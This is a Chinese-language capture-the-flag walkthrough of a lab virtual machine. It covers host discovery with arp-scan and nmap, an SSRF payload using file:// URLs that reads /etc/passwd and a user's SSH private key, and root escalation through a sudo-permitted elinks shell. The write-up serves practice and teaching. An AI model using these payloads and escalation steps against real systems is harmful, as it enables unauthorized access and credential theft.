1. 信息搜集
2. 80端口
3. 提权

信息搜集

arp-scan -l扫描靶机地址

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:da:a9:b6       PCS Systemtechnik GmbH
192.168.31.147  08:00:27:e8:2b:5e       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel

192.168.31.147就是靶机ip，然后nmap扫描端口

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.147
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 04:25 EDT
Nmap scan report for 192.168.31.147
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E8:2B:5E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds

80端口

80端口是一个web页面存在ssrf漏洞，POST传参url=file:///etc/passwd，文件内容会进行base64加密

可以读取到welcome这个用户，home目录下不存在id_rsa,读取/etc/ssh/sshd_config

1
2
3

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

然后挨个试试id_rsa,id_ecdsa,id_ed25519,可以发现存在id_ed25519

1	url=file:///home/welcome/.ssh/id_ed25519

拿到私钥了就可以ssh登录了

提权

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ssh welcome@192.168.31.147 -i id
Linux Anjv 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 19 04:31:17 2025 from 192.168.31.129
welcome@Anjv:~$

sudo -l可以发现elinks可以以root用户执行，可以直接读取root.txt，也可以任意文件读写，最简单的是再elinks终端按下esc->file->OS SHELL

就可以获取到root的shell了

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

lvzhouhang

群友机-Anjy

信息搜集

80端口

提权